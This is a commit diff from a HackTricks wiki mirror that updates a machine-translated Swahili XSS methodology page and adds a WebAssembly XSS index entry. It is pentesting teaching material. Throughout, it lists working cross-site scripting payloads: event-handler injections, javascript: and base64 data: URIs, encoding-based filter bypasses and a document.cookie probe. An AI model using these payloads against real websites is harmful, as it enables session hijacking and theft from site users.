maride/hacktricks
1
0
Fork 0
mirror of https://github.com/HackTricks-wiki/hacktricks.git synced 2025-10-10 18:36:50 +00:00
Code Issues Packages Projects Releases Wiki Activity

Translated ['src/pentesting-web/xss-cross-site-scripting/wasm-linear-mem

Browse Source
This commit is contained in:
Translator 2025-09-29 15:07:50 +00:00
parent 0714e2b46c
commit b40a1679e9
3 changed files with 347 additions and 205 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

1
src/SUMMARY.md
View File

@ -725,6 +725,7 @@
- [SOME - Same Origin Method Execution](pentesting-web/xss-cross-site-scripting/some-same-origin-method-execution.md)
- [Sniff Leak](pentesting-web/xss-cross-site-scripting/sniff-leak.md)
- [Steal Info JS](pentesting-web/xss-cross-site-scripting/steal-info-js.md)
- [Wasm Linear Memory Template Overwrite Xss](pentesting-web/xss-cross-site-scripting/wasm-linear-memory-template-overwrite-xss.md)
- [XSS in Markdown](pentesting-web/xss-cross-site-scripting/xss-in-markdown.md)
- [XSSI (Cross-Site Script Inclusion)](pentesting-web/xssi-cross-site-script-inclusion.md)
- [XS-Search/XS-Leaks](pentesting-web/xs-search/README.md)

418
src/pentesting-web/xss-cross-site-scripting/README.md
View File

@ -4,81 +4,80 @@
## Mbinu
1. Angalia kama **thamani yoyote unayodhibiti** (_parameters_, _path_, _headers_?, _cookies_?) ina **inaakisiwa** kwenye HTML au **inatumika** na **JS** code.
2. **Tafuta muktadha** ambapo imeakisiwa/inatumika.
3. Ikiwa **imeakisiwa**
1. Angalia kama **thamani yoyote unayonadhibiti** (_parameters_, _path_, _headers_?, _cookies_?) inarudishwa (**reflected**) katika HTML au **inatumika** na **JS** code.
2. **Tambua muktadha** ambako inarudishwa/inatumiwa.
3. Ikiwa **inarudishwa**
1. Angalia **ni alama gani unaweza kutumia** na kulingana na hilo, andaa payload:
1. Katika **raw HTML**:
1. Je, unaweza kuunda new HTML tags?
2. Je, unaweza kutumia events au attributes zinazounga mkono protocol ya `javascript:`?
3. Je, unaweza bypass kinga?
4. Je, HTML content inaelezwa na engine yoyote ya client side JS (_AngularJS_, _VueJS_, _Mavo_...)? Unaweza kuabusu [**Client Side Template Injection**](../client-side-template-injection-csti.md).
5. Ikiwa huwezi kuunda HTML tags zinazotekeleza JS code, je, unaweza kuabusu [**Dangling Markup - HTML scriptless injection**](../dangling-markup-html-scriptless-injection/index.html)?
1. Je, unaweza kuunda tags mpya za HTML?
2. Je, unaweza kutumia events au attributes zinazounga mkono `javascript:` protocol?
3. Je, unaweza kuepuka ulinzi?
4. Je, maudhui ya HTML yanatafsiriwa na engine yoyote ya client side JS (_AngularJS_, _VueJS_, _Mavo_...), ambayo unaweza kutumia [**Client Side Template Injection**](../client-side-template-injection-csti.md).
5. Ikiwa huwezi kuunda HTML tags zinazotekeleza code ya JS, je, unaweza kutumia [**Dangling Markup - HTML scriptless injection**](../dangling-markup-html-scriptless-injection/index.html)?
2. Ndani ya **HTML tag**:
1. Je, unaweza kutoka kwenye attribute na kutoka kwenye tag (basi utakuwa kwenye raw HTML) na kuunda new HTML tag ya kuabusu?
2. Je, unaweza kuunda new events/attributes za kutekeleza JS code?
3. Je, attribute ambamo umekwama inaunga mkono utekelezaji wa JS?
4. Je, unaweza bypass kinga?
1. Je, unaweza kutoka katika muktadha wa raw HTML?
2. Je, unaweza kuunda events/attributes mpya za kukimbisha JS code?
3. Je, attribute ambamo umefungwa inaunga mkono utekelezaji wa JS?
4. Je, unaweza kuepuka ulinzi?
3. Ndani ya **JavaScript code**:
1. Je, unaweza kutoka kwenye `<script>` tag?
2. Je, unaweza kutoroka string na kuendesha JS code tofauti?
3. Je, input zako ziko katika template literals ``?
4. Je, unaweza bypass kinga?
4. Javascript **function** inayo **tekelezwa**
1. Unaweza kutaja jina la function ya kutekeleza. mfano: `?callback=alert(1)`
1. Je, unaweza kutoroka `<script>` tag?
2. Je, unaweza kutoroka string na kuendesha code tofauti ya JS?
3. Je, input zako ziko katika template literals \`\`?
4. Je, unaweza kuepuka ulinzi?
4. Javascript **function** inayotekelezwa
1. Unaweza kuelezea jina la function itakayotekelezwa. mfano: `?callback=alert(1)`
4. Ikiwa **inatumika**:
1. Unaweza kufaida **DOM XSS**, zingatia jinsi input yako inavyozimiliwa na ikiwa **input yako inayodhibitiwa inatumiwa na sink yoyote.**
Unapofanya kazi kwenye XSS tata unaweza kupata inavutia kujua kuhusu:
1. Unaweza kujaribu **DOM XSS**, zingatia jinsi input yako inasawiriwa na kama **input iliyodhibitiwa inatumika kwenye sink yoyote.**
Unapofanya kazi kwenye XSS tata unaweza kupata kuwa ni muhimu kujua kuhusu:
{{#ref}}
debugging-client-side-js.md
{{#endref}}
## Thamani zilizoreflektwa
## Thamani zilizoonyeshwa
Ili kufaida XSS kwa mafanikio kitu cha kwanza unachotakiwa kupata ni **thamani unayodhibiti ambayo inaakisiwa** kwenye ukurasa wa wavuti.
Ili kuinua XSS kwa mafanikio kitu cha kwanza unachotakiwa kupata ni **thamani unayonadhibiti ambayo inarejeshwa** katika ukurasa wa wavuti.
- **Intermediately reflected**: Ikiwa unagundua thamani ya parameter au hata path inaakisiwa kwenye ukurasa wa wavuti unaweza kufaida **Reflected XSS**.
- **Stored and reflected**: Ikiwa unagundua thamani unayodhibiti imehifadhiwa kwenye server na inaakisiwa kila ukitembelea ukurasa unaweza kufaida **Stored XSS**.
- **Accessed via JS**: Ikiwa unagundua thamani unayodhibiti inafikiwa kwa kutumia JS unaweza kufaida **DOM XSS**.
- **Intermediately reflected**: Ikiwa unagundua kwamba thamani ya parameter au hata path inarejeshwa katika ukurasa wa wavuti unaweza kuendeleza **Reflected XSS**.
- **Stored and reflected**: Ikiwa unagundua kwamba thamani unayonadhibiti imehifadhiwa kwenye server na inarejeshwa kila wakati unaingia ukurasa unaweza kuendeleza **Stored XSS**.
- **Accessed via JS**: Ikiwa unagundua kwamba thamani unayonadhibiti inafikiwa kwa kutumia JS unaweza kuendeleza **DOM XSS**.
## Muktadha
Unapojaribu kufaida XSS jambo la kwanza unalotakiwa kujua ni **wapi input yako inaakisiwa**. Kulingana na muktadha, utaweza kutekeleza JS kode kwa njia tofauti.
Unapojaribu kuiangamiza XSS kitu cha kwanza unachotakiwa kujua ni **wapi input yako inarejeshwa**. Kulingana na muktadha, utaweza kuendesha JS kwa njia tofauti.
### Raw HTML
Ikiwa input yako **inaakisiwa kwenye raw HTML** ukurasa utahitaji kuabusu baadhi ya **HTML tag** ili kutekeleza JS code: `<img , <iframe , <svg , <script` ... hizi ni baadhi tu ya tag nyingi za HTML unazoweza kutumia.\
Kama input yako **inarudishwa kwenye raw HTML** ukurasa utahitaji kutumia baadhi ya **HTML tag** ili kuendesha JS code: <img , <iframe , <svg , <script ... hizi ni baadhi tu ya tags nyingi unazoweza kutumia.\
Pia, kumbuka [Client Side Template Injection](../client-side-template-injection-csti.md).
### Ndani ya attribute za HTML tag
### Ndani ya attribute za tag za HTML
Ikiwa input yako inaakisiwa ndani ya thamani ya attribute ya tag unaweza kujaribu:
Ikiwa input yako inarejeshwa ndani ya value ya attribute ya tag unaweza kujaribu:
1. Kutoka kwenye **attribute na kutoka kwenye tag** (basi utakuwa kwenye raw HTML) na kuunda new HTML tag ya kuabusu: `"><img [...]`
2. Ikiwa **unaweza kutoka kwenye attribute lakini si kutoka kwenye tag** (`>` imeencoded au imeondolewa), kulingana na tag unaweza **kuunda event** inayotekeleza JS code: `" autofocus onfocus=alert(1) x="`
3. Ikiwa **huwezi kutoka kwenye attribute** (`"` imeencoded au imeondolewa), basi kulingana na **attribute gani** thamani yako inaakisiwa ndani yake **ikiwa unadhibiti thamani yote au sehemu tu** utaweza kuiabusu. Kwa **mfano**, ikiwa unadhibiti event kama `onclick=` utaweza kuifanya itekeleze code yoyote inapobofuliwa. Mfano mwingine wa kuvutia ni attribute `href`, ambapo unaweza kutumia protocol ya `javascript:` kutekeleza code yoyote: **`href="javascript:alert(1)"`**
4. Ikiwa input yako inaakisiwa ndani ya "**unexpoitable tags**" unaweza kujaribu mbinu ya **`accesskey`** kuabusu vuln (utahitaji aina ya social engineering kuifaidika): **`" accesskey="x" onclick="alert(1)" x="`**
1. **Kutoka katika attribute na kutoka ndani ya tag** (kisha utakuwa katika raw HTML) na kuunda tag mpya za HTML za kutumiwa: `"><img [...]`
2. Ikiwa **unaweza kutoka katika attribute lakini si kutoka ndani ya tag** (`>` imekodishwa au imefutwa), kulingana na tag unaweza **kuunda event** inayotekeleza JS code: `" autofocus onfocus=alert(1) x="`
3. Ikiwa **hutaweza kutoka katika attribute** (`"` inakodishwa au kufutwa), basi kulingana na **attribute gani** thamani yako inarejeshwa na **kama unadhibiti thamani yote au sehemu tu** utaweza kuitumia. Kwa **mfano**, kama unadhibiti event kama `onclick=` utaweza kuiifanya iendeshe code chochote inapobonyezwa. Mfano mwingine wa kuvutia ni attribute `href`, ambapo unaweza kutumia protocol ya `javascript:` kuendesha code: **`href="javascript:alert(1)"`**
4. Ikiwa input yako inarejeshwa ndani ya "unexpoitable tags" unaweza kujaribu mbinu ya **`accesskey`** kuchukua faida ya udhaifu (utahitaji aina ya social engineering kutekeleza): **`" accesskey="x" onclick="alert(1)" x="`**
Mfano la ajabu la Angular kutekeleza XSS ikiwa unadhibiti jina la class:
Mfano wa ajabu wa Angular ukifanya XSS ikiwa unadhibiti jina la class:
```html
<div ng-app>
<strong class="ng-init:constructor.constructor('alert(1)')()">aaa</strong>
</div>
```
### Ndani ya JavaScript code
### Ndani ya msimbo wa JavaScript
Katika kesi hii, kiingilio chako kinafunuliwa kati ya **`<script> [...] </script>`** tags za ukurasa wa HTML, ndani ya faili `.js` au ndani ya attribute inayotumia protocol ya **`javascript:`**:
Katika kesi hii ingizo lako linaonyeshwa kati ya **`<script> [...] </script>`** tags za ukurasa wa HTML, ndani ya faili `.js` au ndani ya sifa inayotumia protocol **`javascript:`**:
- Ikiwa kinafunuliwa kati ya **`<script> [...] </script>`** tags, hata kama kiingilio chako kiko ndani ya aina yoyote ya quotes, unaweza kujaribu kuchoma `</script>` na kutoroka kutoka katika muktadha huu. Hii inafanya kazi kwa sababu **browser will first parse the HTML tags** na kisha yaliyomo, kwa hiyo haitagundua kuwa tagi yako ya `</script>` iliyochomwa iko ndani ya HTML code.
- Ikiwa kinafunuliwa **ndani ya JS string** na trick ya mwisho haifanyi kazi utahitaji **kuondoka** kwenye string, **kutekeleza** code yako na **kujenga upya** JS code (kama kuna kosa lolote, haitatekelezwa:
- Ikiwa imeonyeshwa kati ya **`<script> [...] </script>`** tags, hata kama ingizo lako liko ndani ya aina yoyote ya nukuu, unaweza kujaribu kuingiza `</script>` na kutoroka katika muktadha huu. Hii inafanya kazi kwa sababu **kivinjari kitasoma kwanza lebo za HTML** kisha yaliyomo, kwa hiyo haitagundua kuwa tagi yako ya `</script>` uliyoingiza iko ndani ya msimbo wa HTML.
- Ikiwa imeonyeshwa **ndani ya JS string** na mbinu ya mwisho haitumiki utahitaji **kutoka** kwenye string, **kutekeleza** msimbo wako na **kujenga upya** msimbo wa JS (kama kuna kosa, hautatekelezwa:
- `'-alert(1)-'`
- `';-alert(1)//`
- `\';alert(1)//`
- Ikiwa kinafunuliwa ndani ya template literals unaweza **kuingiza JS expressions** kwa kutumia `${ ... }` syntax: `` var greetings = `Hello, ${alert(1)}` ``
- **Unicode encode** inafanya kazi kuandika **valid javascript code**:
- Ikiwa imeonyeshwa ndani ya template literals unaweza **kuingiza expressions za JS** ukitumia syntaxi `${ ... }`: `var greetings = `Hello, ${alert(1)}``
- **Kutumia encoding ya Unicode** hufanya iwezekane kuandika **valid javascript code**:
```javascript
alert(1)
alert(1)
@ -86,8 +85,8 @@ alert(1)
```
#### Javascript Hoisting
Javascript Hoisting inaashiria fursa ya **kutangaza functions, variables or classes baada ya kutumika ili uweze kutumia vibaya mazingira ambapo XSS inatumia undeclared variables au functions.**\
**Angalia ukurasa ufuatao kwa habari zaidi:**
Javascript Hoisting inarejelea fursa ya **kutangaza functions, variables au classes baada ya zimetumika ili uweze kutumia mazingira ambapo XSS inatumia undeclared variables au functions.**\
**Tazama ukurasa ufuatao kwa maelezo zaidi:**
{{#ref}}
@ -96,19 +95,19 @@ js-hoisting.md
### Javascript Function
Several web pages have endpoints that **accept as parameter the name of the function to execute**. A common example to see in the wild is something like: `?callback=callbackFunc`.
Kurasa kadhaa za wavuti zina endpoints ambazo **zinakubali kama parameter jina la function la kutekeleza**. Mfano wa kawaida wa kuona ni kitu kama: `?callback=callbackFunc`.
Njia nzuri ya kugundua ikiwa kitu kinachotolewa moja kwa moja na mtumiaji kinajaribu kutekelezwa ni **kubadilisha thamani ya param** (kwa mfano kuwa 'Vulnerable') na kuangalia console kwa makosa kama:
Njia nzuri ya kugundua kama kitu kinachotolewa moja kwa moja na mtumiaji kinajaribu kutekelezwa ni kwa **kubadilisha thamani ya param** (kwa mfano kuwa 'Vulnerable') na kuangalia console kwa makosa kama:
![](<../../images/image (711).png>)
Iwapo ni vulnerable, unaweza kuweza **kuamsha an alert** kwa kutuma thamani: **`?callback=alert(1)`**. Hata hivyo, ni kawaida kuwa endpoints hizi zitakuwa **zikithibitisha maudhui** ili kuruhusu tu letters, numbers, dots na underscores (**`[\w\._]`**).
Ikiwa ni vulnerable, unaweza kuwa na uwezo wa **kusababisha alert** kwa kutuma tu thamani: **`?callback=alert(1)`**. Hata hivyo, mara nyingi endpoint hizi zitakuwa **zikithibitisha yaliyomo** ili kuruhusu tu herufi, nambari, titikio na underscores (**`[\w\._]`**).
Hata hivyo, hata kwa kizuizi hicho bado inawezekana kufanya baadhi ya vitendo. Hii ni kwa sababu unaweza kutumia chars hizo halali ili **kupata access kwa element yoyote katika DOM**:
Hata hivyo, hata kwa kikomo hicho bado inawezekana kufanya baadhi ya vitendo. Hii ni kwa sababu unaweza kutumia chars halali hizo kufikia **element yoyote kwenye DOM**:
![](<../../images/image (747).png>)
Some useful functions for this:
Baadhi ya functions zenye manufaa kwa hili:
```
firstElementChild
lastElementChild
@ -116,11 +115,11 @@ nextElementSibiling
lastElementSibiling
parentElement
```
Unaweza pia kujaribu kusababisha Javascript functions moja kwa moja: `obj.sales.delOrders`.
Unaweza pia kujaribu **kusababisha Javascript functions** moja kwa moja: `obj.sales.delOrders`.
Hata hivyo, kawaida endpoints zinazotekeleza function iliyotajwa ni endpoints zisizo na DOM nyingi za kuvutia, **other pages in the same origin** zitakuwa na **more interesting DOM** za kufanya vitendo zaidi.
Hata hivyo, kawaida endpoints zinazotekeleza function iliyoashiriwa ni endpoints zisizo na DOM yenye mvuto mwingi, **kurasa nyingine katika same origin** zitakuwa na **DOM yenye mvuto zaidi** za kufanya vitendo vingi.
Kwa hivyo, ili **abuse this vulnerability in a different DOM** uhusishaji wa **Same Origin Method Execution (SOME)** ulitengenezwa:
Hivyo, ili **kuutumia udhaifu huu kwenye DOM tofauti** exploit ya **Same Origin Method Execution (SOME)** ilitengenezwa:
{{#ref}}
@ -129,8 +128,7 @@ some-same-origin-method-execution.md
### DOM
Kuna **JS code** inayotumia kwa njia **isiyo salama** baadhi ya **data controlled by an attacker** kama `location.href`. Mshambulizi anaweza kutumia hili kutekeleza arbitrary JS code.
Kuna **JS code** inayotumia kwa njia isiyo salama baadhi ya **data inayodhibitiwa na mshambulizi** kama `location.href`. Mshambulizi anaweza kutumia hili kuendesha arbitrary JS code.
{{#ref}}
dom-xss.md
@ -138,8 +136,8 @@ dom-xss.md
### **Universal XSS**
Aina hizi za XSS zinaweza kupatikana **anywhere**. Hazitegemei tu unyonyaji wa client wa web application bali zinategemea **any** **context**. Aina hizi za **arbitrary JavaScript execution** zinaweza hata kutumiwa kupata **RCE**, kusoma **arbitrary** **files** kwa clients na servers, na mengine mengi.\
Baadhi ya **examples**:
Aina hizi za XSS zinaweza kupatikana **mahali popote**. Hazitegemei tu udhaifu wa client wa web application bali zinategemea **muktadha** wowote. Aina hizi za **arbitrary JavaScript execution** zinaweza hata kutumiwa kupata **RCE**, **kusoma** **faili zozote** kwenye clients na servers, na mengine mengi.\
Baadhi ya **mfano**:
{{#ref}}
@ -155,11 +153,11 @@ server-side-xss-dynamic-pdf.md
![from https://twitter.com/hackerscrolls/status/1273254212546281473?s=21](<../../images/EauBb2EX0AERaNK (1).jpg>)
## Kuingiza ndani ya raw HTML
## Injecting inside raw HTML
Wakati input yako inarudishwa **inside the HTML page** au unaweza kutoroka na kuingiza HTML code katika muktadha huu, jambo la **kwanza** unalopaswa kufanya ni kuangalia kama unaweza kutumia `<` kuunda tags mpya: Jaribu tu **reflect** hiyo **char** na angalia kama inafanyiwa **HTML encoded** au **deleted** au kama inarudishwa **without changes**. **Ni tu katika kesi ya mwisho utaweza ku-exploit hili**.\
Kwa kesi hizi pia **kumbuka** [**Client Side Template Injection**](../client-side-template-injection-csti.md)**.**\
_**Kumbuka: Maoni ya HTML yanaweza kufungwa kwa kutumia\*\***\***\*`-->`\*\***\***\*au \*\***`--!>`\*\***_
When your input is reflected **inside the HTML page** or you can escape and inject HTML code in this context the **first** thing you need to do if check if you can abuse `<` to create new tags: Just try to **reflect** that **char** and check if it's being **HTML encoded** or **deleted** of if it is **reflected without changes**. **Only in the last case you will be able to exploit this case**.\
For this cases also **keep in mind** [**Client Side Template Injection**](../client-side-template-injection-csti.md)**.**\
_**Kumbuka: A HTML comment can be closed using\*\***\***\*`-->`\*\***\***\*or \*\***`--!>`\*\***_
Katika kesi hii na ikiwa hakuna black/whitelisting inatumiwa, unaweza kutumia payloads kama:
```html
@ -169,22 +167,22 @@ alert(1)
<img src="x" onerror="alert(1)" />
<svg onload=alert('XSS')>
```
Lakini, ikiwa tags/attributes black/whitelisting inatumika, utahitaji **brute-force which tags** unaweza kuunda.\
Mara utakapogundua **which tags are allowed**, utahitaji **brute-force attributes/events** ndani ya tags halali ulizopata ili kuona jinsi unaweza kushambulia muktadha.
Lakini, ikiwa black/whitelisting ya tags/attributes inatumiwa, utahitaji **brute-force which tags** unaweza kuunda.\
Mara utakapo **gundua ni tags zipi zinazoruhusiwa**, itabidi **brute-force attributes/events** ndani ya tags halali ulizopata ili kuona jinsi unavyoweza kushambulia muktadha.
### Tags/Events brute-force
Nenda kwenye [**https://portswigger.net/web-security/cross-site-scripting/cheat-sheet**](https://portswigger.net/web-security/cross-site-scripting/cheat-sheet) na bonyeza _**Copy tags to clipboard**_. Kisha, tuma zote kwa kutumia Burp intruder na ukague kama kuna tags ambazo WAF haikutambua kama zenye madhara. Mara utakapogundua tags unazoweza kutumia, unaweza **brute force all the events** ukitumia tags halali (kwenye ukurasa uleule bonyeza _**Copy events to clipboard**_ na fuata utaratibu uleule kama awali).
Nenda kwenye [**https://portswigger.net/web-security/cross-site-scripting/cheat-sheet**](https://portswigger.net/web-security/cross-site-scripting/cheat-sheet) na bonyeza _**Copy tags to clipboard**_. Kisha, tuma zote kwa kutumia Burp intruder na angalia kama kuna tag ambayo WAF haikutambua kama hatari. Mara utakapo gundua tags unazoweza kutumia, unaweza **brute force all the events** kwa kutumia tags halali (katika ukurasa huo huo bonyeza _**Copy events to clipboard**_ na fuata taratibu ule ule kama hapo awali).
### Custom tags
### Tags maalum
Ikiwa hukupata tag yoyote halali ya HTML, unaweza kujaribu **kuunda a custom tag** na kutekeleza JS code kwa kutumia attribute ya `onfocus`. Katika request ya XSS, unahitaji kumalizia URL na `#` ili kuifanya page **focus on that object** na **execute** the code:
Ikiwa hukupata tag yoyote ya HTML halali, unaweza kujaribu kuunda tag maalum na kutekeleza JS code kwa kutumia attribute `onfocus`. Katika ombi la XSS, unahitaji kumalizia URL kwa `#` ili kufanya ukurasa **ielekeze kwenye kitu hicho** na **kutekeleza** msimbo:
```
/?search=<xss+id%3dx+onfocus%3dalert(document.cookie)+tabindex%3d1>#x
```
### Blacklist Bypasses
Ikiwa aina fulani ya blacklist inatumiwa, unaweza kujaribu ku-bypass kwa mbinu za kuchekesha:
Ikiwa aina fulani ya blacklist inatumiwa unaweza kujaribu ku-bypass kwa mbinu za kuchekesha:
```javascript
//Random capitalization
<script> --> <ScrIpT>
@ -236,29 +234,29 @@ onerror=alert`1`
```
### Length bypass (small XSSs)
> [!NOTE] > **Payload za XSS ndogo zaidi kwa mazingira tofauti** [**can be found here**](https://github.com/terjanq/Tiny-XSS-Payloads) and [**here**](https://tinyxss.terjanq.me).
> [!NOTE] > **Tiny XSS payloads kwa mazingira mbalimbali** zinaweza kupatikana [**hapa**](https://github.com/terjanq/Tiny-XSS-Payloads) na [**hapa**](https://tinyxss.terjanq.me).
```html
<!-- Taken from the blog of Jorge Lajara -->
<svg/onload=alert``> <script src=//aa.es> <script src=//.pw>
```
The last one is using 2 unicode characters which expands to 5: telsr\
More of these characters can be found [here](https://www.unicode.org/charts/normalization/).\
To check in which characters are decomposed check [here](https://www.compart.com/en/unicode/U+2121).
Ya mwisho inatumia tabia 2 za unicode ambazo zinaongezeka hadi 5: telsr\
Zaidi ya tabia hizi zinaweza kupatikana [hapa](https://www.unicode.org/charts/normalization/).\
Ili kukagua ni katika tabia zipi zinavunjwa angalia [hapa](https://www.compart.com/en/unicode/U+2121).
### Click XSS - Clickjacking
Ikiwa ili kuchochea udhaifu unahitaji **mtumiaji kubofya link au form** yenye data iliyowekwa awali unaweza kujaribu [**abuse Clickjacking**](../clickjacking.md#xss-clickjacking) (ikiwa ukurasa una udhaifu).
Ikiwa ili kufaidisha na vunjo hilo unahitaji **mtumiaji kubofya kiungo au fomu** yenye data iliyojazwa awali unaweza kujaribu [**abuse Clickjacking**](../clickjacking.md#xss-clickjacking) (ikiwa ukurasa una udhaifu).
### Impossible - Dangling Markup
Ikiwa unadhani kwamba **haiwezekani kuunda HTML tag yenye attribute inayotekeleza JS code**, unapaswa kuangalia [**Danglig Markup** ](../dangling-markup-html-scriptless-injection/index.html) kwa sababu unaweza **exploit** udhaifu **bila** kuendesha **JS** code.
Ikiwa unadhani tu kwamba **haiwezekani kuunda tag ya HTML yenye attribute itakayotekeleza JS code**, unapaswa kuangalia [**Danglig Markup** ](../dangling-markup-html-scriptless-injection/index.html) kwa sababu unaweza **exploit** vunjo hilo **bila** kutekeleza **JS** code.
## Injecting inside HTML tag
### Inside the tag/escaping from attribute value
Ikiwa uko **ndani ya HTML tag**, jambo la kwanza unaweza kujaribu ni **kutoroka** kutoka tagi na kutumia baadhi ya mbinu zilizotajwa katika [previous section](#injecting-inside-raw-html) ili kuendesha JS code.\
Ikiwa **huwezi kutoroka kutoka tagi**, unaweza kuunda attributes mpya ndani ya tagi kujaribu kuendesha JS code, kwa mfano ukitumia payload kama ( _note that in this example double quotes are use to escape from the attribute, you won't need them if your input is reflected directly inside the tag_ ):
Ikiwa uko **ndani ya tag ya HTML**, jambo la kwanza unaweza kujaribu ni **kutoroka** kutoka tag na kutumia baadhi ya techniques zilizotajwa katika [sehemu iliyopita](#injecting-inside-raw-html) ili kutekeleza JS code.\
Ikiwa **hutaweza kutoka** kwenye tag, unaweza kuunda attributes mpya ndani ya tag kujaribu kutekeleza JS code, kwa mfano kwa kutumia payload kama (_kumbuka kwamba katika mfano huu double quotes zimetumika kukimbia kutoka kwenye attribute, hutazihitaji ikiwa input yako inarudishwa moja kwa moja ndani ya tag_):
```bash
" autofocus onfocus=alert(document.domain) x="
" onfocus=alert(1) id=x tabindex=0 style=display:block>#x #Access http://site.com/?#x t
@ -275,12 +273,12 @@ Ikiwa **huwezi kutoroka kutoka tagi**, unaweza kuunda attributes mpya ndani ya t
```
### Ndani ya attribute
Hata kama **huwezi kuondoka kutoka katika attribute** (`"` inatafsiriwa au kufutwa), kulingana na **attribute gani** thamani yako inaonyeshwa ndani yake na **ikiwa unadhibiti thamani yote au sehemu tu** utaweza kuitumia vibaya. Kwa **mfano**, ikiwa unadhibiti event kama `onclick=` utaweza kufanya iitekeleze msimbo wowote inapobonyezwa.\
Mfano mwingine wa kuvutia ni attribute `href`, ambapo unaweza kutumia protocol ya `javascript:` kuendesha msimbo wowote: **`href="javascript:alert(1)"`**
Hata kama **huwezi kutoroka kutoka kwenye attribute** (`"` inafichwa au kufutwa), kulingana na **attribute gani** thamani yako inaonyeshwa ndani yake — na ikiwa unadhibiti thamani yote au sehemu tu — utaweza kuitumia mbaya. Kwa **mfano**, ikiwa unadhibiti event kama `onclick=` utaweza kuifanya itekeleze code yoyote inapobonolewa.\
Mfano mwingine wa kuvutia ni attribute `href`, ambapo unaweza kutumia protocol ya `javascript:` kutekeleza code yoyote: **`href="javascript:alert(1)"`**
**Bypass inside event using HTML encoding/URL encode**
**Bypass ndani ya event ukitumia HTML encoding/URL encode**
Vikundi vya **HTML encoded characters** ndani ya thamani za attributes za tagi za HTML hubadilishwa tena wakati wa utekelezaji (**decoded on runtime**). Kwa hiyo kitu kama kilicho hapa chini kitakuwa halali (payload iko kwa bold): `<a id="author" href="http://none" onclick="var tracker='http://foo?`**`&apos;-alert(1)-&apos;`**`';">Go Back </a>`
Herufi za **HTML encoded characters** ndani ya thamani za attributes za tags za HTML zinatafsiriwa wakati wa runtime. Kwa hivyo kitu kama kifuatacho kitakuwa halali (the payload is in bold): `<a id="author" href="http://none" onclick="var tracker='http://foo?`**`&apos;-alert(1)-&apos;`**`';">Go Back </a>`
Kumbuka kwamba **aina yoyote ya HTML encode ni halali**:
```javascript
@ -309,9 +307,9 @@ Kumbuka kwamba **aina yoyote ya HTML encode ni halali**:
<img src onerror=\u0061\u006C\u0065\u0072\u0074(1) />
<img src onerror=\u{61}\u{6C}\u{65}\u{72}\u{74}(1) />
```
### Itifaki Maalum ndani ya sifa
### Itifaki Maalum ndani ya attribute
Huko unaweza kutumia itifaki **`javascript:`** au **`data:`** katika maeneo fulani ili **kuendesha msimbo wowote wa JS**. Baadhi zitahitaji mwingiliano wa mtumiaji; nyingine hazitahitaji.
Huko unaweza kutumia itifaki **`javascript:`** au **`data:`** katika maeneo fulani ili **kutekeleza msimbo wa JS wa hiari**. Baadhi zitahitaji mwingiliano wa mtumiaji; zingine hazitahitaji.
```javascript
javascript:alert(1)
JavaSCript:alert(1)
@ -331,9 +329,9 @@ data:text/html;base64,PHNjcmlwdD5hbGVydCgiSGVsbG8iKTs8L3NjcmlwdD4=
data:text/html;charset=thing;base64,PHNjcmlwdD5hbGVydCgndGVzdDMnKTwvc2NyaXB0Pg
data:image/svg+xml;base64,PHN2ZyB4bWxuczpzdmc9Imh0dH A6Ly93d3cudzMub3JnLzIwMDAvc3ZnIiB4bWxucz0iaHR0cDovL3d3dy53My5vcmcv MjAwMC9zdmciIHhtbG5zOnhsaW5rPSJodHRwOi8vd3d3LnczLm9yZy8xOTk5L3hs aW5rIiB2ZXJzaW9uPSIxLjAiIHg9IjAiIHk9IjAiIHdpZHRoPSIxOTQiIGhlaWdodD0iMjAw IiBpZD0ieHNzIj48c2NyaXB0IHR5cGU9InRleHQvZWNtYXNjcmlwdCI+YWxlcnQoIlh TUyIpOzwvc2NyaXB0Pjwvc3ZnPg==
```
**Maeneo ambapo unaweza kuingiza protokoli hizi**
**Maeneo unayoweza kuingiza protokoli hizi**
**Kwa ujumla** protokoli ya `javascript:` inaweza **kutumika katika tag yoyote inayokubali attribute `href`** na katika **tag nyingi** zinazokubali attribute ya **`src`** (lakini sio `<img>`)
**Kwa ujumla** protokoli ya `javascript:` inaweza **kutumika katika tag yoyote inayokubali sifa `href`** na katika **sehemu nyingi** za tag zinazokubali sifa ya **`src`** (lakini si `<img`)
```html
<a href="javascript:alert(1)">
<a href="data:text/html;base64,PHNjcmlwdD5hbGVydCgiSGVsbG8iKTs8L3NjcmlwdD4=">
@ -355,21 +353,21 @@ data:image/svg+xml;base64,PHN2ZyB4bWxuczpzdmc9Imh0dH A6Ly93d3cudzMub3JnLzIwMDAvc
```
**Mbinu nyingine za obfuscation**
_**Katika kesi hii HTML encoding na Unicode encoding trick kutoka sehemu ya awali pia ni halali kwa sababu uko ndani ya attribute.**_
_**Katika kesi hii HTML encoding na Unicode encoding trick kutoka sehemu iliyopita pia ni halali kwani uko ndani ya attribute.**_
```javascript
<a href="javascript:var a='&apos;-alert(1)-&apos;'">
```
Zaidi ya hayo, kuna **njia nyingine nzuri** kwa kesi hizi: **Hata kama input yako ndani ya `javascript:...` inakuwa URL encoded, itakuwa URL decoded kabla haijaendeshwa.** Kwa hivyo, ikiwa unahitaji **escape** kutoka kwa **string** ukitumia **single quote** na ukaona kwamba **inakuwa URL encoded**, kumbuka kwamba **haina umuhimu,** itatafsiriwa kama **single quote** wakati wa **execution**.
Zaidi ya hayo, kuna **njia nzuri** nyingine kwa kesi hizi: **Hata kama input yako ndani ya `javascript:...` inakuwa URL encoded, ita URL decoded kabla ya kutekelezwa.** Kwa hivyo, ikiwa unahitaji **escape** kutoka kwenye **string** ukitumia **single quote** na unaona kwamba **inakuwa URL encoded**, kumbuka kwamba **haina maana,** itaitafsiriwa kama **single quote** wakati wa **execution**.
```javascript
&apos;-alert(1)-&apos;
%27-alert(1)-%27
<iframe src=javascript:%61%6c%65%72%74%28%31%29></iframe>
```
Kumbuka kwamba ikiwa utajaribu **kutumia zote mbili** `URLencode + HTMLencode` kwa utaratibu wowote ili ku-encode **payload** it **haita** **fanya kazi**, lakini unaweza **kuwachanganya ndani ya payload**.
Kumbuka kwamba ukijaribu **tumia zote mbili** `URLencode + HTMLencode` kwa mpangilio wowote ku-encode **payload** **haita** **fanya kazi**, lakini unaweza **changanya ndani ya payload**.
**Kutumia Hex na Octal encode na `javascript:`**
**Kutumia Hex and Octal encode with `javascript:`**
Unaweza kutumia **Hex** na **Octal encode** ndani ya sifa ya `src` ya `iframe` (angalau) kutangaza **HTML tags to execute JS**:
